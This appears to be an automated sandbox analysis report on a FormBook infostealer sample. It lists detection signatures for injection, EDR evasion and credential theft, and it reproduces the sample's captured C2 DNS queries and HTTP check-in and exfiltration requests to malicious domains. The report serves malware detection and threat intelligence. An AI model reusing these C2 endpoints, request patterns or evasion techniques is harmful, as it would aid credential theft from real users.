Windows Analysis Report
GJRX21GBj3.exe

Overview

General Information

Sample name: GJRX21GBj3.exe
renamed because original name is a hash value
Original sample name: 04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa.exe
Analysis ID: 1467022
MD5: 804cc1b2769f38027fd2c2bf8141013b
SHA1: b75af1f4f65b7f12ba311c3c14c67642c0898fb8
SHA256: 04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: http://www.mybodyradar.net/nml2/ Avira URL Cloud: Label: malware
Source: GJRX21GBj3.exe ReversingLabs: Detection: 68%
Source: Yara match File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: GJRX21GBj3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: findstr.pdbGCTL source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ngen.pdb source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360774678.00000000032FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.00000000286EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215505772.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360491290.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: findstr.pdb source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5BF10 FindFirstFileW,FindNextFileW,FindClose, 7_2_02E5BF10
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF658600980
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF658551988
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF6586009D0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rdi 0_2_00007FF658600B00
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rdi 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push r14 0_2_00007FF65865E3C0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF6585D2740
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF658551988
Source: C:\Windows\SysWOW64\findstr.exe Code function: 4x nop then xor eax, eax 7_2_02E49830
Source: C:\Windows\SysWOW64\findstr.exe Code function: 4x nop then pop edi 7_2_02E524A9
Source: C:\Windows\SysWOW64\findstr.exe Code function: 4x nop then pop edi 7_2_02E52487
Source: C:\Windows\SysWOW64\findstr.exe Code function: 4x nop then mov ebx, 00000004h 7_2_03490548

Networking

Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49711 -> 23.227.38.74:80
Source: DNS query: www.mg55aa.xyz
Source: Joe Sandbox View IP Address: 43.155.26.241 43.155.26.241
Source: Joe Sandbox View IP Address: 203.161.55.102 203.161.55.102
Source: Joe Sandbox View IP Address: 108.179.193.98 108.179.193.98
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.valerieomage.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cwgehkk.storeConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /nml2/?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mybodyradar.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lacemalt.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.siteblogoficialon.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mg55aa.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic DNS traffic detected: DNS query: www.gospelstudygroup.org
Source: global traffic DNS traffic detected: DNS query: www.valerieomage.com
Source: global traffic DNS traffic detected: DNS query: www.instantmailer.cloud
Source: global traffic DNS traffic detected: DNS query: www.kosherphonestore.com
Source: global traffic DNS traffic detected: DNS query: www.cwgehkk.store
Source: global traffic DNS traffic detected: DNS query: www.mybodyradar.net
Source: global traffic DNS traffic detected: DNS query: www.lacemalt.top
Source: global traffic DNS traffic detected: DNS query: www.siteblogoficialon.com
Source: global traffic DNS traffic detected: DNS query: www.mcxright.com
Source: global traffic DNS traffic detected: DNS query: www.amkmos.online
Source: global traffic DNS traffic detected: DNS query: www.mg55aa.xyz
Source: global traffic DNS traffic detected: DNS query: www.lavillitadepapa.com
Source: unknown HTTP traffic detected: POST /ktbm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.kosherphonestore.comOrigin: http://www.kosherphonestore.comReferer: http://www.kosherphonestore.com/ktbm/Content-Length: 205Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53Data Raw: 6b 30 36 54 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4d 34 31 46 52 5a 78 33 34 50 55 2b 57 46 78 43 7a 47 70 31 78 73 30 5a 52 59 59 50 30 4b 4e 4c 6a 36 4f 64 33 6b 59 3d Data Ascii: k06T=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:40:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lavillitadepapa.com
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lavillitadepapa.com/i1fz/
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GJRX21GBj3.exe String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: GJRX21GBj3.exe String found in binary or memory: https://aka.ms/nativeaot-c
Source: GJRX21GBj3.exe, 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: GJRX21GBj3.exe String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: GJRX21GBj3.exe String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
